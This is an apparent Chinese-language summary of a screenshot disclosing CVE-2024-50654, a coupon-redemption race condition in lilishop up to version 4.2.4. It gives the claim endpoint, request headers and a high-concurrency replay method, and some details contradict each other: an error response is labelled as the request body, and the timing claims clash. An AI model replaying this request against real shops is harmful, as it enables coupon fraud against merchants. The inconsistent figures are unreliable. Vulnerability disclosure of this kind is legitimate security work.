从这个网页截图中,可以获取到以下关于漏洞的关键信息: 1. 漏洞编号:CVE-2024-50654 2. 目标:https://github.com/lilishop/lilishop 3. 受影响版本:<=4.2.4 4. 描述:攻击者可以通过获取优惠券兑换数据包并使用高并发来突破只能领取一次优惠券的限制,从而实现多优惠券兑换。 5. 详细信息: - 请求URL:/buyer/promotion/coupon/receive/1844275265607499778 - 请求方法:GET - 请求头: - Host: - Connection: keep-alive - sec-ch-ua: "Chromium";v="124", "Microsoft Edge";v="124", "Not-A.Brand";v="99" - Accept: application/json, text/plain, / - accessToken: - sec-ch-ua-mobile: ?0 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6051.102 Safari/537.36 - sec-ch-ua-platform: "Windows" - Origin: - Sec-Fetch-Site: same-site - Sec-Fetch-Mode: cors - Sec-Fetch-Dest: empty - Referer: - Accept-Encoding: gzip, deflate, br, zstd - Accept-Language: zh-CN, zh;q=0.9, en;q=0.8, en-GB;q=0.7, en-US;q=0.6 - 请求体: - {"success":false,"message":"超出领取限制:此优惠券最多领取3张","code":41000,"timestamp":1728567475111,"result":null} - 请求结果: - 1-18次请求返回200状态码,响应时间在86-925毫秒之间。 - 第19次请求返回200状态码,响应时间显著增加到607毫秒。 - 第30次和第35次请求返回200状态码,响应时间分别为818和925毫秒。 这些信息表明,该漏洞允许攻击者通过高并发请求突破优惠券领取限制,从而实现多优惠券兑换。